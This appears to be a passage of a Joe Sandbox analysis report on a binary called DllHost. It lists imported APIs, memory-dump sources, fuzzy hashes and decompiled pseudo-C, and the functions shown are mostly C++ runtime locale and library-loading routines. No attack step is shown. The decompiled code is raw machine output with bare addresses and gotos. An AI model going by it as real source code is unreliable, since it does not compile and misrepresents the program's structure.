                                                                                                                                                              0x7ff7191d82b0
                                                                                                                                                              0x7ff7191d82bf
                                                                                                                                                              0x7ff7191d82bf
                                                                                                                                                              0x7ff7191d82bf
                                                                                                                                                              0x7ff7191d82ca
                                                                                                                                                              0x7ff7191d82cf
                                                                                                                                                              0x7ff7191d82db
                                                                                                                                                              0x7ff7191d82e4
                                                                                                                                                              0x7ff7191d82e9
                                                                                                                                                              0x7ff7191d82f1
                                                                                                                                                              0x7ff7191d82f3
                                                                                                                                                              0x7ff7191d8319

                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF7191D847E,?,?,?,00007FF7191D80F4,?,?,?,?,00007FF7191D4C69), ref: 00007FF7191D8251
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF7191D847E,?,?,?,00007FF7191D80F4,?,?,?,?,00007FF7191D4C69), ref: 00007FF7191D825F
                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF7191D847E,?,?,?,00007FF7191D80F4,?,?,?,?,00007FF7191D4C69), ref: 00007FF7191D8289
                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF7191D847E,?,?,?,00007FF7191D80F4,?,?,?,?,00007FF7191D4C69), ref: 00007FF7191D82CF
                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF7191D847E,?,?,?,00007FF7191D80F4,?,?,?,?,00007FF7191D4C69), ref: 00007FF7191D82DB
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                              • Opcode ID: 362fdf90d6ed18511f73797504d860d3f8892a8d19e42068341458e028504b74
                                                                                                                                                              • Instruction ID: 56fad79756a77480b3a6276fc94aa2a76ee5029674847d523473f3eaf56ad2ce
                                                                                                                                                              • Opcode Fuzzy Hash: 362fdf90d6ed18511f73797504d860d3f8892a8d19e42068341458e028504b74
                                                                                                                                                              • Instruction Fuzzy Hash: BE31B322A1AE4281FA11BF06B414179A3F5BF45BB8F990135DE1D4A794EF3CE08ED721
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191F5E24 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                              • Opcode ID: a0e6ca28e7342ea06f8a26954a7a12586c95e7292c70b1250db6135522365c85
                                                                                                                                                              • Instruction ID: 04bd0003b8bab04b5e513b9c12dacce53785a7dff143b5c4a625fe043e6450b8
                                                                                                                                                              • Opcode Fuzzy Hash: a0e6ca28e7342ea06f8a26954a7a12586c95e7292c70b1250db6135522365c85
                                                                                                                                                              • Instruction Fuzzy Hash: 2D116D31B18E4586F350AF12B854329A2B5BB88BF8F840234EA5E87794DF3CD59D8754
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D1D6C Relevance: 9.2, APIs: 6, Instructions: 203COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiStringWide
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2829165498-0
                                                                                                                                                              • Opcode ID: aa3243ee852579f77275f600182f3f36032b0c396a6c8c6335aa73429464ef40
                                                                                                                                                              • Instruction ID: 0abb0d3ccb0a344043f35b8b29ac8deba65128dab8c164269f1bac8b2c1b4657
                                                                                                                                                              • Opcode Fuzzy Hash: aa3243ee852579f77275f600182f3f36032b0c396a6c8c6335aa73429464ef40
                                                                                                                                                              • Instruction Fuzzy Hash: 9681A232608B4186FB25AF51E4443B9A6F1FB44BB8F940635EA6D07BC4DF3CE48A9750
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191BCCA0 Relevance: 9.1, APIs: 6, Instructions: 91COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E00007FF77FF7191BCCA0(long long __rbx, void* __rcx, long long __rsi) {
				intOrPtr _t30;
				void* _t33;
				void* _t37;
				void* _t41;
				void* _t45;
				signed long long _t54;
				signed long long _t55;
				intOrPtr _t56;
				long long _t57;
				long long _t63;
				intOrPtr _t69;
				void* _t78;
				signed long long _t79;
				signed long long _t80;
				long long _t83;
				long long _t85;
				void* _t86;
				void* _t88;
				signed long long _t89;

				 *((long long*)(_t88 + 0x10)) = __rbx;
				 *((long long*)(_t88 + 0x18)) = _t85;
				 *((long long*)(_t88 + 0x20)) = __rsi;
				_t89 = _t88 - 0x40;
				_t54 =  *0x192190a0; // 0x590452ce5669
				_t55 = _t54 ^ _t89;
				 *(_t89 + 0x30) = _t55;
				_t86 = __rcx;
				E00007FF77FF7191D0D0C(0, _t89 + 0x24);
				_t83 =  *0x1921be58; // 0x208c96f8a80
				 *((long long*)(_t89 + 0x28)) = _t83;
				_t79 =  *0x1921a900; // 0x1
				if (_t79 != 0) goto 0x191bcd28;
				E00007FF77FF7191D0D0C(0, _t89 + 0x20);
				_t45 =  *0x1921a900 - _t79; // 0x1
				if (_t45 != 0) goto 0x191bcd17;
				_t30 =  *0x1921a8f0; // 0x6
				 *0x1921a8f0 = _t30 + 1;
				 *0x1921a900 = _t55;
				_t33 = E00007FF77FF7191D0D84(_t55, _t89 + 0x20);
				_t80 =  *0x1921a900; // 0x1
				_t69 =  *((intOrPtr*)(_t86 + 8));
				if (_t80 -  *((intOrPtr*)(_t69 + 0x18)) >= 0) goto 0x191bcd41;
				_t56 =  *((intOrPtr*)(_t69 + 0x10));
				if ( *((intOrPtr*)(_t56 + _t80 * 8)) != 0) goto 0x191bcda0;
				goto 0x191bcd43;
				if ( *((char*)(_t69 + 0x24)) == 0) goto 0x191bcd5c;
				E00007FF77FF7191D113C(_t33);
				if (_t80 -  *((intOrPtr*)(_t56 + 0x18)) >= 0) goto 0x191bcd61;
				_t57 =  *((intOrPtr*)(_t56 + 0x10));
				if ( *((intOrPtr*)(_t57 + _t80 * 8)) != 0) goto 0x191bcda0;
				if (_t83 == 0) goto 0x191bcd6b;
				goto 0x191bcda0;
				E00007FF77FF7191B2420(_t57, _t83, _t89 + 0x28, _t86, _t83);
				if (_t57 == 0xffffffff) goto 0x191bcdcf;
				_t63 =  *((intOrPtr*)(_t89 + 0x28));
				 *((long long*)(_t89 + 0x28)) = _t63;
				E00007FF77FF7191D1104(_t57, _t63);
				_t37 =  *((intOrPtr*)( *_t63 + 8))(_t78);
				 *0x1921be58 = _t63;
				return E00007FF77FF7191D23B0(E00007FF77FF7191D0D84(_t37, _t89 + 0x24), _t41,  *(_t89 + 0x30) ^ _t89);
			}






















                                                                                                                                                              0x7ff7191bcca0
                                                                                                                                                              0x7ff7191bcca5
                                                                                                                                                              0x7ff7191bccaa
                                                                                                                                                              0x7ff7191bccb0
                                                                                                                                                              0x7ff7191bccb4
                                                                                                                                                              0x7ff7191bccbb
                                                                                                                                                              0x7ff7191bccbe
                                                                                                                                                              0x7ff7191bccc3
                                                                                                                                                              0x7ff7191bcccd
                                                                                                                                                              0x7ff7191bccd3
                                                                                                                                                              0x7ff7191bccda
                                                                                                                                                              0x7ff7191bccdf
                                                                                                                                                              0x7ff7191bcce9
                                                                                                                                                              0x7ff7191bccf2
                                                                                                                                                              0x7ff7191bccf7
                                                                                                                                                              0x7ff7191bccfe
                                                                                                                                                              0x7ff7191bcd00
                                                                                                                                                              0x7ff7191bcd08
                                                                                                                                                              0x7ff7191bcd10
                                                                                                                                                              0x7ff7191bcd1c
                                                                                                                                                              0x7ff7191bcd21
                                                                                                                                                              0x7ff7191bcd28
                                                                                                                                                              0x7ff7191bcd30
                                                                                                                                                              0x7ff7191bcd32
                                                                                                                                                              0x7ff7191bcd3d
                                                                                                                                                              0x7ff7191bcd3f
                                                                                                                                                              0x7ff7191bcd47
                                                                                                                                                              0x7ff7191bcd49
                                                                                                                                                              0x7ff7191bcd52
                                                                                                                                                              0x7ff7191bcd54
                                                                                                                                                              0x7ff7191bcd5f
                                                                                                                                                              0x7ff7191bcd64
                                                                                                                                                              0x7ff7191bcd69
                                                                                                                                                              0x7ff7191bcd73
                                                                                                                                                              0x7ff7191bcd7c
                                                                                                                                                              0x7ff7191bcd7e
                                                                                                                                                              0x7ff7191bcd83
                                                                                                                                                              0x7ff7191bcd8b
                                                                                                                                                              0x7ff7191bcd96
                                                                                                                                                              0x7ff7191bcd99
                                                                                                                                                              0x7ff7191bcdce

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2081738530-0
                                                                                                                                                              • Opcode ID: 4c9be20f1ef5c680e45924576cfa7fc921aa7d14d65ea6d9f91fa194d6084132
                                                                                                                                                              • Instruction ID: 09b657157bcad45ac85ebb44e301d998a2264a0ba349fce238251cfab5c8f50a
                                                                                                                                                              • Opcode Fuzzy Hash: 4c9be20f1ef5c680e45924576cfa7fc921aa7d14d65ea6d9f91fa194d6084132
                                                                                                                                                              • Instruction Fuzzy Hash: EF315226A09E4181FA14AF15F440179E7B1FB84BF8F880532EA4E07795DF3CE59AD750
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191BBDE0 Relevance: 9.1, APIs: 6, Instructions: 91COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E00007FF77FF7191BBDE0(long long __rbx, void* __rcx, long long __rsi) {
				intOrPtr _t30;
				void* _t33;
				void* _t37;
				void* _t41;
				void* _t45;
				signed long long _t54;
				signed long long _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				long long _t63;
				intOrPtr _t69;
				void* _t78;
				signed long long _t79;
				signed long long _t80;
				long long _t83;
				long long _t85;
				void* _t86;
				void* _t88;
				signed long long _t89;

				 *((long long*)(_t88 + 0x10)) = __rbx;
				 *((long long*)(_t88 + 0x18)) = _t85;
				 *((long long*)(_t88 + 0x20)) = __rsi;
				_t89 = _t88 - 0x40;
				_t54 =  *0x192190a0; // 0x590452ce5669
				_t55 = _t54 ^ _t89;
				 *(_t89 + 0x30) = _t55;
				_t86 = __rcx;
				E00007FF77FF7191D0D0C(0, _t89 + 0x24);
				_t83 =  *0x1921be48; // 0x208c7992da0
				 *((long long*)(_t89 + 0x28)) = _t83;
				_t79 =  *0x1921be90; // 0x5
				if (_t79 != 0) goto 0x191bbe68;
				E00007FF77FF7191D0D0C(0, _t89 + 0x20);
				_t45 =  *0x1921be90 - _t79; // 0x5
				if (_t45 != 0) goto 0x191bbe57;
				_t30 =  *0x1921a8f0; // 0x6
				 *0x1921a8f0 = _t30 + 1;
				 *0x1921be90 = _t55;
				_t33 = E00007FF77FF7191D0D84(_t55, _t89 + 0x20);
				_t80 =  *0x1921be90; // 0x5
				_t69 =  *((intOrPtr*)(_t86 + 8));
				if (_t80 -  *((intOrPtr*)(_t69 + 0x18)) >= 0) goto 0x191bbe81;
				_t56 =  *((intOrPtr*)(_t69 + 0x10));
				if ( *((intOrPtr*)(_t56 + _t80 * 8)) != 0) goto 0x191bbee0;
				goto 0x191bbe83;
				if ( *((char*)(_t69 + 0x24)) == 0) goto 0x191bbe9c;
				E00007FF77FF7191D113C(_t33);
				if (_t80 -  *((intOrPtr*)(_t56 + 0x18)) >= 0) goto 0x191bbea1;
				_t57 =  *((intOrPtr*)(_t56 + 0x10));
				if ( *((intOrPtr*)(_t57 + _t80 * 8)) != 0) goto 0x191bbee0;
				if (_t83 == 0) goto 0x191bbeab;
				goto 0x191bbee0;
				E00007FF77FF7191BD010(_t57, _t83, _t89 + 0x28, _t86, _t83);
				if (_t57 == 0xffffffff) goto 0x191bbf0f;
				_t63 =  *((intOrPtr*)(_t89 + 0x28));
				 *((long long*)(_t89 + 0x28)) = _t63;
				E00007FF77FF7191D1104(_t57, _t63);
				_t37 =  *((intOrPtr*)( *_t63 + 8))(_t78);
				 *0x1921be48 = _t63;
				return E00007FF77FF7191D23B0(E00007FF77FF7191D0D84(_t37, _t89 + 0x24), _t41,  *(_t89 + 0x30) ^ _t89);
			}






















                                                                                                                                                              0x7ff7191bbde0
                                                                                                                                                              0x7ff7191bbde5
                                                                                                                                                              0x7ff7191bbdea
                                                                                                                                                              0x7ff7191bbdf0
                                                                                                                                                              0x7ff7191bbdf4
                                                                                                                                                              0x7ff7191bbdfb
                                                                                                                                                              0x7ff7191bbdfe
                                                                                                                                                              0x7ff7191bbe03
                                                                                                                                                              0x7ff7191bbe0d
                                                                                                                                                              0x7ff7191bbe13
                                                                                                                                                              0x7ff7191bbe1a
                                                                                                                                                              0x7ff7191bbe1f
                                                                                                                                                              0x7ff7191bbe29
                                                                                                                                                              0x7ff7191bbe32
                                                                                                                                                              0x7ff7191bbe37
                                                                                                                                                              0x7ff7191bbe3e
                                                                                                                                                              0x7ff7191bbe40
                                                                                                                                                              0x7ff7191bbe48
                                                                                                                                                              0x7ff7191bbe50
                                                                                                                                                              0x7ff7191bbe5c
                                                                                                                                                              0x7ff7191bbe61
                                                                                                                                                              0x7ff7191bbe68
                                                                                                                                                              0x7ff7191bbe70
                                                                                                                                                              0x7ff7191bbe72
                                                                                                                                                              0x7ff7191bbe7d
                                                                                                                                                              0x7ff7191bbe7f
                                                                                                                                                              0x7ff7191bbe87
                                                                                                                                                              0x7ff7191bbe89
                                                                                                                                                              0x7ff7191bbe92
                                                                                                                                                              0x7ff7191bbe94
                                                                                                                                                              0x7ff7191bbe9f
                                                                                                                                                              0x7ff7191bbea4
                                                                                                                                                              0x7ff7191bbea9
                                                                                                                                                              0x7ff7191bbeb3
                                                                                                                                                              0x7ff7191bbebc
                                                                                                                                                              0x7ff7191bbebe
                                                                                                                                                              0x7ff7191bbec3
                                                                                                                                                              0x7ff7191bbecb
                                                                                                                                                              0x7ff7191bbed6
                                                                                                                                                              0x7ff7191bbed9
                                                                                                                                                              0x7ff7191bbf0e

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2081738530-0
                                                                                                                                                              • Opcode ID: 878fdd97f24f1f5af648782496b4bd12f78439280d182a4bcf6dbe76b7cf8341
                                                                                                                                                              • Instruction ID: 209d965afe4fa93efae886826a79aeb526c4c209005d3cd02ae6e99365e8e09f
                                                                                                                                                              • Opcode Fuzzy Hash: 878fdd97f24f1f5af648782496b4bd12f78439280d182a4bcf6dbe76b7cf8341
                                                                                                                                                              • Instruction Fuzzy Hash: B0314221A08E4181FA64EF11F540169A3B1FB48BB8FC80132EB5E077A9DF3CE59AD750
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C0A70 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                              			E00007FF77FF7191C0A70(intOrPtr __rax, long long __rbx, void* __rcx, long long _a8, char _a16, void* _a24, long long _a32) {
				intOrPtr _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				intOrPtr _t45;
				intOrPtr _t46;
				long long _t47;
				long long _t53;
				long long _t59;
				intOrPtr _t66;
				signed long long _t67;
				long long _t68;
				void* _t69;

				_t45 = __rax;
				_a32 = __rbx;
				_t69 = __rcx;
				E00007FF77FF7191D0D0C(0,  &_a16);
				_t68 =  *0x1921a798; // 0x208c970c380
				_a24 = _t68;
				_t66 =  *0x1921be88; // 0x4
				if (_t66 != 0) goto 0x191c0ae1;
				E00007FF77FF7191D0D0C(0,  &_a8);
				_t37 =  *0x1921be88 - _t66; // 0x4
				if (_t37 != 0) goto 0x191c0ad0;
				_t24 =  *0x1921a8f0; // 0x6
				 *0x1921a8f0 = _t24 + 1;
				 *0x1921be88 = _t45;
				_t27 = E00007FF77FF7191D0D84(_t45,  &_a8);
				_t67 =  *0x1921be88; // 0x4
				_t59 = _a8;
				if (_t67 -  *((intOrPtr*)(_t59 + 0x18)) >= 0) goto 0x191c0afa;
				_t46 =  *((intOrPtr*)(_t59 + 0x10));
				if ( *((intOrPtr*)(_t46 + _t67 * 8)) != 0) goto 0x191c0b59;
				goto 0x191c0afc;
				if ( *((char*)(_t59 + 0x24)) == 0) goto 0x191c0b15;
				E00007FF77FF7191D113C(_t27);
				if (_t67 -  *((intOrPtr*)(_t46 + 0x18)) >= 0) goto 0x191c0b1a;
				_t47 =  *((intOrPtr*)(_t46 + 0x10));
				if ( *((intOrPtr*)(_t47 + _t67 * 8)) != 0) goto 0x191c0b59;
				if (_t68 == 0) goto 0x191c0b24;
				goto 0x191c0b59;
				E00007FF77FF7191C27A0(_t47, _t68,  &_a24, _t69);
				if (_t47 == 0xffffffff) goto 0x191c0b73;
				_t53 = _a24;
				_a8 = _t53;
				E00007FF77FF7191D1104(_t47, _t53);
				_t31 =  *((intOrPtr*)( *_t53 + 8))();
				 *0x1921a798 = _t53;
				return E00007FF77FF7191D0D84(_t31,  &_a16);
			}
















                                                                                                                                                              0x7ff7191c0a70
                                                                                                                                                              0x7ff7191c0a70
                                                                                                                                                              0x7ff7191c0a7c
                                                                                                                                                              0x7ff7191c0a86
                                                                                                                                                              0x7ff7191c0a8c
                                                                                                                                                              0x7ff7191c0a93
                                                                                                                                                              0x7ff7191c0a98
                                                                                                                                                              0x7ff7191c0aa2
                                                                                                                                                              0x7ff7191c0aab
                                                                                                                                                              0x7ff7191c0ab0
                                                                                                                                                              0x7ff7191c0ab7
                                                                                                                                                              0x7ff7191c0ab9
                                                                                                                                                              0x7ff7191c0ac1
                                                                                                                                                              0x7ff7191c0ac9
                                                                                                                                                              0x7ff7191c0ad5
                                                                                                                                                              0x7ff7191c0ada
                                                                                                                                                              0x7ff7191c0ae1
                                                                                                                                                              0x7ff7191c0ae9
                                                                                                                                                              0x7ff7191c0aeb
                                                                                                                                                              0x7ff7191c0af6
                                                                                                                                                              0x7ff7191c0af8
                                                                                                                                                              0x7ff7191c0b00
                                                                                                                                                              0x7ff7191c0b02
                                                                                                                                                              0x7ff7191c0b0b
                                                                                                                                                              0x7ff7191c0b0d
                                                                                                                                                              0x7ff7191c0b18
                                                                                                                                                              0x7ff7191c0b1d
                                                                                                                                                              0x7ff7191c0b22
                                                                                                                                                              0x7ff7191c0b2c
                                                                                                                                                              0x7ff7191c0b35
                                                                                                                                                              0x7ff7191c0b37
                                                                                                                                                              0x7ff7191c0b3c
                                                                                                                                                              0x7ff7191c0b44
                                                                                                                                                              0x7ff7191c0b4f
                                                                                                                                                              0x7ff7191c0b52
                                                                                                                                                              0x7ff7191c0b72

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2081738530-0
                                                                                                                                                              • Opcode ID: b9fcf9ec62361f966f603e416c2a9d2b9b1d75b488670cf5e4cbdce9332d5faf
                                                                                                                                                              • Instruction ID: eaff7879da5e34e135c70fc51136516551db07d3a0628191f19644379e9e4e2c
                                                                                                                                                              • Opcode Fuzzy Hash: b9fcf9ec62361f966f603e416c2a9d2b9b1d75b488670cf5e4cbdce9332d5faf
                                                                                                                                                              • Instruction Fuzzy Hash: A9318E26A18E4281FE15FF15F8402B9E3B0EB55BBCF881132DA5D07695DE7CE49B9320
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C0960 Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E00007FF77FF7191C0960(intOrPtr __rax, long long __rbx, void* __rcx, long long _a8, char _a16, void* _a24, long long _a32) {
				void* __rdi;
				void* __rsi;
				intOrPtr _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				intOrPtr _t45;
				intOrPtr _t46;
				long long _t47;
				long long _t53;
				long long _t59;
				intOrPtr _t66;
				signed long long _t67;
				long long _t68;
				void* _t69;

				_t45 = __rax;
				_a32 = __rbx;
				_t69 = __rcx;
				E00007FF77FF7191D0D0C(0,  &_a16);
				_t68 =  *0x1921a790; // 0x208c79931a0
				_a24 = _t68;
				_t66 =  *0x1921be68; // 0x3
				if (_t66 != 0) goto 0x191c09d1;
				E00007FF77FF7191D0D0C(0,  &_a8);
				_t37 =  *0x1921be68 - _t66; // 0x3
				if (_t37 != 0) goto 0x191c09c0;
				_t24 =  *0x1921a8f0; // 0x6
				 *0x1921a8f0 = _t24 + 1;
				 *0x1921be68 = _t45;
				_t27 = E00007FF77FF7191D0D84(_t45,  &_a8);
				_t67 =  *0x1921be68; // 0x3
				_t59 = _a8;
				if (_t67 -  *((intOrPtr*)(_t59 + 0x18)) >= 0) goto 0x191c09ea;
				_t46 =  *((intOrPtr*)(_t59 + 0x10));
				if ( *((intOrPtr*)(_t46 + _t67 * 8)) != 0) goto 0x191c0a49;
				goto 0x191c09ec;
				if ( *((char*)(_t59 + 0x24)) == 0) goto 0x191c0a05;
				E00007FF77FF7191D113C(_t27);
				if (_t67 -  *((intOrPtr*)(_t46 + 0x18)) >= 0) goto 0x191c0a0a;
				_t47 =  *((intOrPtr*)(_t46 + 0x10));
				if ( *((intOrPtr*)(_t47 + _t67 * 8)) != 0) goto 0x191c0a49;
				if (_t68 == 0) goto 0x191c0a14;
				goto 0x191c0a49;
				E00007FF77FF7191C2600(_t47, _t68,  &_a24, _t69, _t67, _t68);
				if (_t47 == 0xffffffff) goto 0x191c0a63;
				_t53 = _a24;
				_a8 = _t53;
				E00007FF77FF7191D1104(_t47, _t53);
				_t31 =  *((intOrPtr*)( *_t53 + 8))();
				 *0x1921a790 = _t53;
				return E00007FF77FF7191D0D84(_t31,  &_a16);
			}


















                                                                                                                                                              0x7ff7191c0960
                                                                                                                                                              0x7ff7191c0960
                                                                                                                                                              0x7ff7191c096c
                                                                                                                                                              0x7ff7191c0976
                                                                                                                                                              0x7ff7191c097c
                                                                                                                                                              0x7ff7191c0983
                                                                                                                                                              0x7ff7191c0988
                                                                                                                                                              0x7ff7191c0992
                                                                                                                                                              0x7ff7191c099b
                                                                                                                                                              0x7ff7191c09a0
                                                                                                                                                              0x7ff7191c09a7
                                                                                                                                                              0x7ff7191c09a9
                                                                                                                                                              0x7ff7191c09b1
                                                                                                                                                              0x7ff7191c09b9
                                                                                                                                                              0x7ff7191c09c5
                                                                                                                                                              0x7ff7191c09ca
                                                                                                                                                              0x7ff7191c09d1
                                                                                                                                                              0x7ff7191c09d9
                                                                                                                                                              0x7ff7191c09db
                                                                                                                                                              0x7ff7191c09e6
                                                                                                                                                              0x7ff7191c09e8
                                                                                                                                                              0x7ff7191c09f0
                                                                                                                                                              0x7ff7191c09f2
                                                                                                                                                              0x7ff7191c09fb
                                                                                                                                                              0x7ff7191c09fd
                                                                                                                                                              0x7ff7191c0a08
                                                                                                                                                              0x7ff7191c0a0d
                                                                                                                                                              0x7ff7191c0a12
                                                                                                                                                              0x7ff7191c0a1c
                                                                                                                                                              0x7ff7191c0a25
                                                                                                                                                              0x7ff7191c0a27
                                                                                                                                                              0x7ff7191c0a2c
                                                                                                                                                              0x7ff7191c0a34
                                                                                                                                                              0x7ff7191c0a3f
                                                                                                                                                              0x7ff7191c0a42
                                                                                                                                                              0x7ff7191c0a62

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
